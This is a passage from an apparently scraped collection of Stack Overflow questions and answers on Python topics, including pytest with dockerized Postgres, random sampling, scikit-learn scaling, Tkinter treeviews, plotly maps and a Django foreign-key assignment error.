what is the best choice for you, use AUTO.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"CPU\")\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO.\n" ]
[ 0 ]
[ "If your model calls the fit function in batches, there are different samples in the same batch with slightly different times over the course of the iteration, and then you try again and again to get more and more groups of predictive model performance time will be longer and longer.\n" ]
[ -1 ]
[ "keras", "python", "tensorflow" ]
stackoverflow_0049777263_keras_python_tensorflow.txt
Q: Using pytest with a dockerized Postgres database I'm currently creating a separate database for the sake of my tests. Is there any better solution to run the test suite when the database is running in Docker and I don't want my tests to mess up my production database? A: You are already using a dockerized database as your "production database". You could add a second dockerized database as a "develop database". This second instance should replicate the production database, and be spun up / torn down as part of the test suite. Advantages of using dockerized database instances as part of the test environment Ensures that the development environment mimics production Allows to test database migrations before deploying to a production environment Allows to test queries before running them in production Once setup, maintenance can be easier than the maintenance of mocked data interfaces Advantages of mocking database connections in the test environment Initial setup is easier Smaller project stack (e.g. Docker potentially not required) Generally speaking, I personally go for the second approach just for small projects, and spend the time to set up a proper dockerized local environment for any medium or large project. On a different note, to the additional question in comments of the OP: for my CI/CD pipeline have no idea how to do the test stage without this [create a new database and running a migration] manual procedure Generally speaking, a suggested approach would be to: Bundle any required dockerized interface in a docker-compose.yml Create an entrypoint (this can be a Python function) that creates a database, runs database migrations and loads mock data to the database Run tests The exact commands on CI could look something like: - docker-compose up # Initialize database instance - make dev-environment # Call a Makefile recipe to create the database, run migrations and load mock data - make tests # Call a Makefile recipe to run the test suite
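A minimal pytest sketch of the dockerized develop-database approach described above: tests talk only to the test instance and never touch production. The connection string, port mapping and throw-away schema are all assumptions; adjust them to whatever your docker-compose.yml exposes.

import os
import psycopg2   # assumes psycopg2-binary is installed
import pytest

TEST_DSN = os.environ.get(
    "TEST_DATABASE_URL",
    "postgresql://postgres:postgres@localhost:5433/test_db",   # assumed mapping
)

@pytest.fixture(scope="session")
def db_connection():
    conn = psycopg2.connect(TEST_DSN)
    conn.autocommit = True
    with conn.cursor() as cur:
        cur.execute("DROP SCHEMA IF EXISTS test_schema CASCADE")
        cur.execute("CREATE SCHEMA test_schema")
        # run migrations / load mock data here
    yield conn
    conn.close()

def test_database_reachable(db_connection):
    with db_connection.cursor() as cur:
        cur.execute("SELECT 1")
        assert cur.fetchone() == (1,)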
Using pytest with a dockerized Postgres database
I'm currently creating a separate database for the sake of my tests. Is there any better solution to run the test suite when the database is running in Docker and I don't want my tests to mess up my production database?
[ "You are already using a dockerized database as your \"production database\". You could add a second dockerized database as a \"develop database\". This second instance should replicate the production database, and be spun up / torn down as part of the test suite.\nAdvantages of using dockerized database instances as part of the test environment\n\nEnsures that the development environment mimics production\n\nAllows to test database migrations before deploying to a production environment\n\nAllows to test queries before running them in production\n\nOnce setup, maintenance can be easier than the maintenance of mocked data interfaces\n\n\nAdvantages of mocking database connections in the test environment\n\nInitial setup is easier\nSmaller project stack (e.g. Docker potentially not required)\n\nGenerally speaking, I personally go for the second approach just for small projects, and spend the time to set up a proper dockerized local environment for any medium or large project.\n\nOn a different note, to the additional question in comments of the OP:\n\nfor my CI/CD pipeline have no idea how to do the test stage without this [create a new database and running a migration] manual procedure\n\nGenerally speaking, a suggested approach would be to:\n\nBundle any required dockerized interface in a docker-compose.yml\nCreate an entrypoint (this can be a Python function) that creates a database, runs database migrations and loads mock data to the database\nRun tests\n\nThe exact commands on CI could look something like:\n- docker-compose up # Initialize database instance\n- make dev-environment # Call a Makefile recipe to create the database, run migrations and load mock data\n- make tests # Call a Makefile recipe to run the test suite\n\n" ]
[ 1 ]
[]
[]
[ "docker", "postgresql", "pytest", "python", "testing" ]
stackoverflow_0074361237_docker_postgresql_pytest_python_testing.txt
Q: How can I perform multiple random.choices tests I have a list called marbles of 10.000 items (5000 blue and 5000 red) I want to do a test. To pick 4 random items from the list I do this import random marbles = ["RED" for _ in range(5000)] + ["BLUE" for _ in range(5000)] A = random.choices(marbles, k=4) print(A) # this will print a list of 4 random Items from the list What I need to do is to perform this test 100 times and print the results. I want to avoid creating 100 different variables and then print them all. What can I do to optimize and avoid >100 lines of code. For loops? I would appreciate any input. Thank you in advance Nothing with my list seemed to have a problem. A: Use a for loop. for x in range(4): print(random.choice(marbles)) A: Sampling with and without replacement It's important to understand the difference between sampling with replacement and without replacement. Say we have a bag of 1 blue and 2 red marbles, and you select 2 marbles. If you put the marble back after pulling the first marble, it's possible to endup with 2 blue marbles. This is called sampling with replacement. Using random.choice is sampling with replacement. random.choices() and random.sample() You can pull more than one element using the choices() function from the random module. For example sampling 4 marbles from a bag of 1 red and 2 blue marbles with replacement: >>> import random >>> marbles = ['red'] * 1 + ['blue'] * 2 >>> random.choices(marbles, k=4) ['red', 'blue', 'blue', 'blue'] You can use sampling without replacement using the random module using the sample function: >>> random.sample(marbles, 4) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/opt/homebrew/Cellar/python@3.10/3.10.8/Frameworks/Python.framework/Versions/3.10/lib/python3.10/random.py", line 482, in sample raise ValueError("Sample larger than population or is negative") ValueError: Sample larger than population or is negative As expected, this gives an error. You can't draw 4 marbles from a bag of 3. Now if we put 1000 red marbles and 2000 blue marbles in the bag, we get: >>> marbles = ['red'] * 1000 + ['blue'] * 2000 >>> random.sample(marbles, 4) ['blue', 'blue', 'blue', 'red'] Memory usage and weights A possible problem with the examples above is that, if you have more marbles, you need a lot of memory. Therefore, the choice() function has a weights parameter. You can use it like this: >>> marbles = ['red', 'blue'] >>> weights = [1000, 2000] >>> random.choices(marbles, weights=weights, k=4) ['blue', 'blue', 'blue', 'red'] Sadly, the random module doesn't have a function for sampling without replacement using weights. Repeated sampling using for loop Finally, we need to count the outcomes. A more advanced way to do this is using dictionaries and defaultdict from the collections module. As an alternative, we will create a list of outcomes, and loop through the different outcomes using a set of that list. import random SAMPLE_SIZE = 4 REPEAT_SAMPLING = 100 outcomes = [] marbles = ['red'] * 5000 + ['blue'] * 5000 for i in range(REPEAT_SAMPLING): outcome = ', '.join(random.sample(marbles, SAMPLE_SIZE)) outcomes.append(outcome) for outcome in set(outcomes): print(f'{outcome} appeared {outcomes.count(outcome)} times out of {REPEAT_SAMPLING}')
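An equivalent way to tally the 100 draws with collections.Counter instead of the list.count() loop in the second answer — a sketch, using the RED/BLUE list from the question:

import random
from collections import Counter

marbles = ["RED"] * 5000 + ["BLUE"] * 5000

# 100 draws of 4 marbles each; sorting makes e.g. (BLUE, RED, RED, RED) one key
# regardless of draw order.
results = Counter(tuple(sorted(random.choices(marbles, k=4))) for _ in range(100))

for combo, times in results.most_common():
    print(combo, "appeared", times, "times out of 100")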
How can I perform multiple random.choices tests
I have a list called marbles of 10.000 items (5000 blue and 5000 red) I want to do a test. To pick 4 random items from the list I do this import random marbles = ["RED" for _ in range(5000)] + ["BLUE" for _ in range(5000)] A = random.choices(marbles, k=4) print(A) # this will print a list of 4 random Items from the list What I need to do is to perform this test 100 times and print the results. I want to avoid creating 100 different variables and then print them all. What can I do to optimize and avoid >100 lines of code. For loops? I would appreciate any input. Thank you in advance Nothing with my list seemed to have a problem.
[ "Use a for loop.\nfor x in range(4):\n print(random.choice(marbles))\n\n", "Sampling with and without replacement\nIt's important to understand the difference between sampling with replacement and without replacement. Say we have a bag of 1 blue and 2 red marbles, and you select 2 marbles. If you put the marble back after pulling the first marble, it's possible to endup with 2 blue marbles. This is called sampling with replacement. Using random.choice is sampling with replacement.\nrandom.choices() and random.sample()\nYou can pull more than one element using the choices() function from the random module. For example sampling 4 marbles from a bag of 1 red and 2 blue marbles with replacement:\n>>> import random\n>>> marbles = ['red'] * 1 + ['blue'] * 2\n>>> random.choices(marbles, k=4)\n['red', 'blue', 'blue', 'blue']\n\nYou can use sampling without replacement using the random module using the sample function:\n>>> random.sample(marbles, 4)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/opt/homebrew/Cellar/python@3.10/3.10.8/Frameworks/Python.framework/Versions/3.10/lib/python3.10/random.py\", line 482, in sample\n raise ValueError(\"Sample larger than population or is negative\")\nValueError: Sample larger than population or is negative\n\nAs expected, this gives an error. You can't draw 4 marbles from a bag of 3. Now if we put 1000 red marbles and 2000 blue marbles in the bag, we get:\n>>> marbles = ['red'] * 1000 + ['blue'] * 2000\n>>> random.sample(marbles, 4)\n['blue', 'blue', 'blue', 'red']\n\nMemory usage and weights\nA possible problem with the examples above is that, if you have more marbles, you need a lot of memory. Therefore, the choice() function has a weights parameter. You can use it like this:\n>>> marbles = ['red', 'blue']\n>>> weights = [1000, 2000]\n>>> random.choices(marbles, weights=weights, k=4)\n['blue', 'blue', 'blue', 'red']\n\nSadly, the random module doesn't have a function for sampling without replacement using weights.\nRepeated sampling using for loop\nFinally, we need to count the outcomes. A more advanced way to do this is using dictionaries and defaultdict from the collections module. As an alternative, we will create a list of outcomes, and loop through the different outcomes using a set of that list.\nimport random\nSAMPLE_SIZE = 4\nREPEAT_SAMPLING = 100\noutcomes = []\nmarbles = ['red'] * 5000 + ['blue'] * 5000\n\nfor i in range(REPEAT_SAMPLING):\n outcome = ', '.join(random.sample(marbles, SAMPLE_SIZE))\n outcomes.append(outcome)\n\nfor outcome in set(outcomes):\n print(f'{outcome} appeared {outcomes.count(outcome)} times out of {REPEAT_SAMPLING}')\n\n" ]
[ 0, 0 ]
[]
[]
[ "loops", "python", "random" ]
stackoverflow_0074574168_loops_python_random.txt
Q: How to scale data with a center that doesn't change with scikit-learn and python I am attempting to scale a dateset to train a machine learning model on using python and scikit-learn. I want to scale a dataset but maintain that all the raw values that are negative remain negative post scaling and all the raw values that are positive remain positive after scaling. Something like this pseudo code for a single feature: from sklearn import preprocessing array = [[-5.0, 0.0, 1.25, 2.5]] scaler = preprocessing.SomeScaler(feature_range=(-1,1), center=0) scaler = scaler.fit(array) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-1.0, 0.0, 0.25, 0.5]] #data arriving after initial scaling might look like this: scaler = scaler.fit([[-0.1, 0.1, 7.0, 10.0]]) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-0.02, 0.02, 1.4, 2.0]] I am new to machine learning, so I am hoping I just don't know the terms / functions of scikit-learn well enough yet. Does something like my above SomeScaler exist in scikit-learn or perhaps another python library? A: Firstly, if you want an array of 1 feature, 4 values you need to reshape your array. import numpy as np print('This is an array of 1-value for 4-features', np.array([[-5.0, 0.0, 1.25, 2.5]]).shape) print('This is an array of 4-values for 1-feature', np.array([-5.0, 0.0, 1.25, 2.5]).shape) #[output] This is an array of 1-value for 4-features (1, 4) #[output] This is an array of 4-values for 1-feature (4,) Secondly, you can scale using MaxAbsScaler: Scale each feature by its maximum absolute value. This estimator scales and translates each feature individually such that the maximal absolute value of each feature in the training set will be 1.0. It does not shift/center the data, and thus does not destroy any sparsity. from sklearn import preprocessing import numpy as np array = [-5.0, 0.0, 1.25, 2.5] #Reshape your data using array.reshape(-1, 1) if your data has a single feature or array to make it 2D array = np.array(array).reshape(-1, 1) print("Array shape after reshaping it to a 2D array: ",array.shape) scaler = preprocessing.MaxAbsScaler() scaler = scaler.fit(array) print("Scaled:", scaler.transform(np.array(array).reshape(-1, 1))) #[output] Array shape after reshaping it to a 2D array: (4, 1) #[output] Scaled: [[-1. ] # [ 0. ] # [ 0.25] # [ 0.5 ]] Imputers usually require arrays to be 2D that is why we used reshape to add a 2nd dimension.
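The question's second snippet re-fits the scaler on the later data, but the expected output (-0.02, 0.02, 1.4, 2.0) appears to be what you get if you keep the original fit and only call transform on the new values — a short sketch reusing the numbers from the question:

import numpy as np
from sklearn.preprocessing import MaxAbsScaler

train = np.array([-5.0, 0.0, 1.25, 2.5]).reshape(-1, 1)
later = np.array([-0.1, 0.1, 7.0, 10.0]).reshape(-1, 1)

scaler = MaxAbsScaler().fit(train)       # max absolute value is 5.0
print(scaler.transform(train).ravel())   # [-1.    0.    0.25  0.5 ]
print(scaler.transform(later).ravel())   # [-0.02  0.02  1.4   2.  ]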
How to scale data with a center that doesn't change with scikit-learn and python
I am attempting to scale a dateset to train a machine learning model on using python and scikit-learn. I want to scale a dataset but maintain that all the raw values that are negative remain negative post scaling and all the raw values that are positive remain positive after scaling. Something like this pseudo code for a single feature: from sklearn import preprocessing array = [[-5.0, 0.0, 1.25, 2.5]] scaler = preprocessing.SomeScaler(feature_range=(-1,1), center=0) scaler = scaler.fit(array) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-1.0, 0.0, 0.25, 0.5]] #data arriving after initial scaling might look like this: scaler = scaler.fit([[-0.1, 0.1, 7.0, 10.0]]) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-0.02, 0.02, 1.4, 2.0]] I am new to machine learning, so I am hoping I just don't know the terms / functions of scikit-learn well enough yet. Does something like my above SomeScaler exist in scikit-learn or perhaps another python library?
[ "\nFirstly, if you want an array of 1 feature, 4 values you need to reshape your array.\n\nimport numpy as np\nprint('This is an array of 1-value for 4-features', np.array([[-5.0, 0.0, 1.25, 2.5]]).shape)\nprint('This is an array of 4-values for 1-feature', np.array([-5.0, 0.0, 1.25, 2.5]).shape)\n#[output] This is an array of 1-value for 4-features (1, 4)\n#[output] This is an array of 4-values for 1-feature (4,)\n\n\nSecondly, you can scale using MaxAbsScaler:\n\n\nScale each feature by its maximum absolute value.\nThis estimator scales and translates each feature individually such that the maximal absolute value of each feature in the training set will be 1.0. It does not shift/center the data, and thus does not destroy any sparsity.\n\n\nfrom sklearn import preprocessing\nimport numpy as np\n\narray = [-5.0, 0.0, 1.25, 2.5]\n#Reshape your data using array.reshape(-1, 1) if your data has a single feature or array to make it 2D\narray = np.array(array).reshape(-1, 1)\nprint(\"Array shape after reshaping it to a 2D array: \",array.shape)\nscaler = preprocessing.MaxAbsScaler()\nscaler = scaler.fit(array)\nprint(\"Scaled:\", scaler.transform(np.array(array).reshape(-1, 1)))\n\n#[output] Array shape after reshaping it to a 2D array: (4, 1)\n#[output] Scaled: [[-1. ]\n# [ 0. ]\n# [ 0.25]\n# [ 0.5 ]]\n\nImputers usually require arrays to be 2D that is why we used reshape to add a 2nd dimension.\n" ]
[ 1 ]
[]
[]
[ "data_preprocessing", "machine_learning", "normalization", "python", "scikit_learn" ]
stackoverflow_0074574548_data_preprocessing_machine_learning_normalization_python_scikit_learn.txt
Q: Replace value text in Tkinter Treeview Is there way to replace the value that is displayed (in this case a very long hyperlink) in a Tkinter treeview column with something shorter (but it still open the hyperlink)? The example I have is similar to the screenshot below, except the Google link is actually a very long OneNote link. I would like to be able to replace the text that is displayed with a "Click Here". So for this example, "Click Here" would take the user to www.google.com. The code I'm using to add the hyperlink is as follows: from tkinter import * from tkinter import ttk import webbrowser as wb root=Tk() root.title('Decision Tree') root.geometry("600x600") my_tree = ttk.Treeview(root) #Define the columns my_tree['columns'] = ("Decision", "Hyperlinks", "ID") #format the columns my_tree.column("#0", width=250, minwidth=100) my_tree.column("#1", width=0, stretch="No") my_tree.column("Hyperlinks", anchor=W, width=200) my_tree.column("ID", anchor=CENTER, width=80) #Create Headings my_tree.heading("#0", text="Decision", anchor=W) my_tree.heading("#1", text="", anchor=W) my_tree.heading("Hyperlinks", text="Hyperlinks", anchor=W) my_tree.heading("ID", text="ID", anchor=CENTER) #Add Data (Top Level) my_tree.insert(parent='', index='1', iid=0, text="Problem 1", values=("", "", "1")) my_tree.insert(parent='', index='1', iid=2, text="Problem 2", values=("", "", "3")) my_tree.insert(parent='', index='1', iid=1, text="Problem 3", values=("", "", "2")) my_tree.tag_configure('tag1', foreground='Blue', font=('Helvetica' ,8, 'bold', 'italic')) #Add child level 1 my_tree.insert(parent='0', index='end', iid=6, text="Prob 1 level 2", values=("", "www.google.com", "1.1"), tags='tag1',) my_tree.insert(parent='1', index='end', iid=7, text="Prob 3 level 2", values=("", "www.google.com", "3.1"), tags='tag1',) my_tree.insert(parent='2', index='end', iid=8, text="Prob 2 level 2", values=("", "www.google.com", "2.1"), tags='tag1',) #Add child level 2 my_tree.insert(parent='6', index='end', iid=9, text="Prob 1 level 3", values=("", "", "1.11")) my_tree.insert(parent='7', index='end', iid=10, text="Prob 2 level 3", values=("", "", "2.21")) def open_link(event): tree = event.widget # get the treeview widget region = tree.identify_region(event.x, event.y) col = tree.identify_column(event.x) iid = tree.identify('item', event.x, event.y) if region == 'cell' and col == '#2': link = tree.item(iid)['values'][1] # get the link from the selected row wb.open_new_tab(link) # open the link in a browser tab # bind left-click to 'open_link' my_tree.bind('<Button-1>', open_link) #pack to the screen my_tree.pack(pady=20) root.mainloop() A: You can store the links in a dictionary, with the key being whatever you want to display to the user. Then it’s just a matter of looking up the link when the user clicks. Another alternative is to put the actual link in a hidden column.
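A trimmed-down sketch of the dictionary approach from the answer, applied to the code in the question: the tree shows a short label and the real URL is looked up by row id on click. The google.com URL stands in for the long OneNote link.

import tkinter as tk
from tkinter import ttk
import webbrowser as wb

links = {}   # row iid -> full hyperlink

root = tk.Tk()
tree = ttk.Treeview(root, columns=("Hyperlinks",), show="headings")
tree.heading("Hyperlinks", text="Hyperlinks")
tree.pack(pady=20)

iid = tree.insert("", "end", values=("Click Here",))
links[iid] = "https://www.google.com"   # stand-in for the long OneNote link

def open_link(event):
    if tree.identify_column(event.x) == "#1":
        row = tree.identify('item', event.x, event.y)
        if row in links:
            wb.open_new_tab(links[row])

tree.bind("<Button-1>", open_link)
root.mainloop()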
Replace value text in Tkinter Treeview
Is there way to replace the value that is displayed (in this case a very long hyperlink) in a Tkinter treeview column with something shorter (but it still open the hyperlink)? The example I have is similar to the screenshot below, except the Google link is actually a very long OneNote link. I would like to be able to replace the text that is displayed with a "Click Here". So for this example, "Click Here" would take the user to www.google.com. The code I'm using to add the hyperlink is as follows: from tkinter import * from tkinter import ttk import webbrowser as wb root=Tk() root.title('Decision Tree') root.geometry("600x600") my_tree = ttk.Treeview(root) #Define the columns my_tree['columns'] = ("Decision", "Hyperlinks", "ID") #format the columns my_tree.column("#0", width=250, minwidth=100) my_tree.column("#1", width=0, stretch="No") my_tree.column("Hyperlinks", anchor=W, width=200) my_tree.column("ID", anchor=CENTER, width=80) #Create Headings my_tree.heading("#0", text="Decision", anchor=W) my_tree.heading("#1", text="", anchor=W) my_tree.heading("Hyperlinks", text="Hyperlinks", anchor=W) my_tree.heading("ID", text="ID", anchor=CENTER) #Add Data (Top Level) my_tree.insert(parent='', index='1', iid=0, text="Problem 1", values=("", "", "1")) my_tree.insert(parent='', index='1', iid=2, text="Problem 2", values=("", "", "3")) my_tree.insert(parent='', index='1', iid=1, text="Problem 3", values=("", "", "2")) my_tree.tag_configure('tag1', foreground='Blue', font=('Helvetica' ,8, 'bold', 'italic')) #Add child level 1 my_tree.insert(parent='0', index='end', iid=6, text="Prob 1 level 2", values=("", "www.google.com", "1.1"), tags='tag1',) my_tree.insert(parent='1', index='end', iid=7, text="Prob 3 level 2", values=("", "www.google.com", "3.1"), tags='tag1',) my_tree.insert(parent='2', index='end', iid=8, text="Prob 2 level 2", values=("", "www.google.com", "2.1"), tags='tag1',) #Add child level 2 my_tree.insert(parent='6', index='end', iid=9, text="Prob 1 level 3", values=("", "", "1.11")) my_tree.insert(parent='7', index='end', iid=10, text="Prob 2 level 3", values=("", "", "2.21")) def open_link(event): tree = event.widget # get the treeview widget region = tree.identify_region(event.x, event.y) col = tree.identify_column(event.x) iid = tree.identify('item', event.x, event.y) if region == 'cell' and col == '#2': link = tree.item(iid)['values'][1] # get the link from the selected row wb.open_new_tab(link) # open the link in a browser tab # bind left-click to 'open_link' my_tree.bind('<Button-1>', open_link) #pack to the screen my_tree.pack(pady=20) root.mainloop()
[ "You can store the links in a dictionary, with the key being whatever you want to display to the user. Then it’s just a matter of looking up the link when the user clicks.\nAnother alternative is to put the actual link in a hidden column.\n" ]
[ 1 ]
[]
[]
[ "hyperlink", "python", "tkinter", "treeview" ]
stackoverflow_0074573939_hyperlink_python_tkinter_treeview.txt
Q: What Python libraries can I use to produce such markers on a map? The markers should also have popup functionality I tried to inspect element on the website I got this image from, but did not find anything useful. Here is the link
What Python libraries can I use to produce such markers on a map? The markers should also have popup functionality
I tried to inspect element on the website I got this image from, but did not find anything useful. Here is the link
[]
[]
[ "Hi Hope you are doing well!\nI can highly recommend plotly for this task, I was using it in my previous to create a dashboard with a map and different labels/markers etc. It has a lot of benefits (e.g., different kinds of map styles) and really easy to use!\n\nExample of the plotly usage for maps visualization: https://plotly.com/python/scattermapbox/\n\nplotly docs: https://plotly.com/graphing-libraries/\n\nHow to change the style of the map: https://plotly.com/python/mapbox-layers/\n\n\n" ]
[ -1 ]
[ "maps", "python", "visualization" ]
stackoverflow_0074568686_maps_python_visualization.txt
Q: Tkinter treeview selection of mutiple rows and retrieve the selected rows I am using the sample Treeview widget for the user to select the multiple rows. I used the tree.selection method for this in the code. However, I am unable to figure out a better approach to retrieve the selected rows in an appropriate way. For example, If the user selects the IDs with 1 and 2. Then I would like to use the Price ,Items information etc for the different task. If the user selects all the three rows then so on .... Below is the working sample, I tried to split it and saved it in the variables but it will not work if the user select one or two rows ?[![enter image description here][1]][1] Thanks. import tkinter as tk import tkinter.ttk def Tree_Focus_Area(): curItems = tree.selection() Var=",".join([str(tree.item(i)['values']) for i in curItems]) a, b,c,d,e,f,g,h,i,j,k,l = str(Var).split(",") print("The selected items for the first ID:", a,b,c,d) print("The selected items for the second ID:", e,f,g,h) print("The selected items for the second ID:", i,j,k,l) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) root.mainloop() Updated code def Tree_Focus_Area(): #from @acw1668 selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] return tuple(rows) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) ****Trying to access the tuple outside the function here**** var = Tree_Focus_Area() print(var) #Returning empty if I use this way? root.mainloop() A: You can simply get the values tuple of the selected rows and append them to a list: def Tree_Focus_Area(): selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] for i, row in enumerate(rows, 1): print(f"The selected items for ID #{i}:", ', '.join(row))
Tkinter treeview selection of multiple rows and retrieving the selected rows
I am using the sample Treeview widget for the user to select the multiple rows. I used the tree.selection method for this in the code. However, I am unable to figure out a better approach to retrieve the selected rows in an appropriate way. For example, If the user selects the IDs with 1 and 2. Then I would like to use the Price ,Items information etc for the different task. If the user selects all the three rows then so on .... Below is the working sample, I tried to split it and saved it in the variables but it will not work if the user select one or two rows ?[![enter image description here][1]][1] Thanks. import tkinter as tk import tkinter.ttk def Tree_Focus_Area(): curItems = tree.selection() Var=",".join([str(tree.item(i)['values']) for i in curItems]) a, b,c,d,e,f,g,h,i,j,k,l = str(Var).split(",") print("The selected items for the first ID:", a,b,c,d) print("The selected items for the second ID:", e,f,g,h) print("The selected items for the second ID:", i,j,k,l) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) root.mainloop() Updated code def Tree_Focus_Area(): #from @acw1668 selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] return tuple(rows) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) ****Trying to access the tuple outside the function here**** var = Tree_Focus_Area() print(var) #Returning empty if I use this way? root.mainloop()
[ "You can simply get the values tuple of the selected rows and append them to a list:\ndef Tree_Focus_Area():\n selections = tree.selection()\n rows = [tree.item(i, 'values') for i in selections]\n for i, row in enumerate(rows, 1):\n print(f\"The selected items for ID #{i}:\", ', '.join(row))\n\n" ]
[ 1 ]
[]
[]
[ "python", "tkinter", "treeview" ]
stackoverflow_0074574078_python_tkinter_treeview.txt
Q: Django ValueError: Cannot assign ">": "Booking.user" must be a "Customer" instance The objective is simple: I'm building a car rental platform where customers can place an order for a car. The simple 'order' contains the car, start, and end-dates. The form should automatically save the authenticated user as the creator. It uses a CreateView with this code: class BookingCreate(CreateView): model = Booking fields = ['car', 'start_date', 'end_date'] permission_classes = [permissions.IsAuthenticated] def form_valid(self, form): form.instance.user = self.request.user return super().form_valid(form) The form works fine, but when submitted, it raises this error: ValueError at /rentals/booking/create Cannot assign "<SimpleLazyObject: <CustomUser: Test2 Two>>": "Booking.user" must be a "Customer" instance. I've looked up previous answers, and the best solution came from this thread, which recommended using this code instead def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user) return super().form_valid(form) However, this change returns a slightly different error: ValueError at /rentals/booking/create Cannot query "Test2 Two": Must be "Customer" instance. I have a customUser Model and a "customer" model that inherits from it. For additional context, I am using a customUser model. Because I have multiple user types (in particular (car) Owners and Customers), I use a special table with boolean fields to mark each type as True based on the registration form they use per this this tutorial. Here's the relevant code (there's a lot, so I've only added the relevant parts): models.py from accounts.models import CustomUser class User(CustomUser): is_customer = models.BooleanField(default=False) is_owner = models.BooleanField(default=False) class Owner(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) def __str__(self): return self.user.first_name class Customer(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) cars = models.ManyToManyField('Car', blank=True) ... def get_absolute_url(self): return reverse('rental:customer-detail', args=[str(self.id)]) def __str__(self): return f'{ self.user.first_name } { self.user.last_name }' class Booking(models.Model): """Stores the bookings, for example when it was made, the booking date, and the car ID.""" # Unique ID for this booking. id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text="Automatically generated unique ID. Do not change.") user = models.ForeignKey('Customer', on_delete=models.SET_NULL, null=True) car = models.ForeignKey(Car, on_delete=models.SET_NULL, null=True) start_date = models.DateField(default=timezone.now) end_date = models.DateField(null=True) ... Solution and extra resources for future explorers Both answers below helped, but the issue kept coming back. The permanent solution was this line of code: def form_valid(self, form): form.instance.created_by = Customer.objects.get(pk=self.request.user.pk) return super().form_valid(form) As alluded to in the question above, this is a common problem. 
So here are three other threads to look at, each with great answers: ValueError at /post/new/ Cannot assign "<SimpleLazyObject:<User: chetan>>": "Post.author" must be a "User" instance Cannot assign "<SimpleLazyObject: <User: XXX>>": "Comment.user" must be a "MyProfile" instance Cannot assign "<SimpleLazyObject: <User: JohnDoe12>>": "Profile.user" must be a "User" instance A: Your self.request.user (or the user you're logged in as) seems to be the CustomUser instance, but you're trying to assign the User instance to the Booking. Though it has the same fields (as it inherits from CustomUser class), it is a different object. I think you want to make the CustomUser an abstract model? You should add abstract to the CustomUser class. See: https://docs.djangoproject.com/en/4.1/topics/db/models/#abstract-base-classes class Meta: abstract = True Then you would also need to select the correct user model in you'r settings like: AUTH_USER_MODEL = 'users.User' for example https://docs.djangoproject.com/en/4.1/topics/auth/customizing/#substituting-a-custom-user-model Also in the second option you're assigning the Booking instead of the related user. Do this instead: def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user).user return super().form_valid(form) A: I'd recommend you to use get_object_or_404() and you need to assign user not Booking instance so: def form_valid(self, form): form.instance.user=get_object_or_404(Booking,user=self.request.user).user return super().form_valid(form)
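A compact sketch of the fix described in the "Solution" paragraph above, reusing the model and field names from the post (Booking.user is a ForeignKey to Customer, and Customer uses the user's primary key as its own). The import path is an assumption, and the assignment targets user to match the Booking model shown, whereas the post's solution line uses created_by from the asker's own code.

from django.shortcuts import get_object_or_404
from django.views.generic import CreateView

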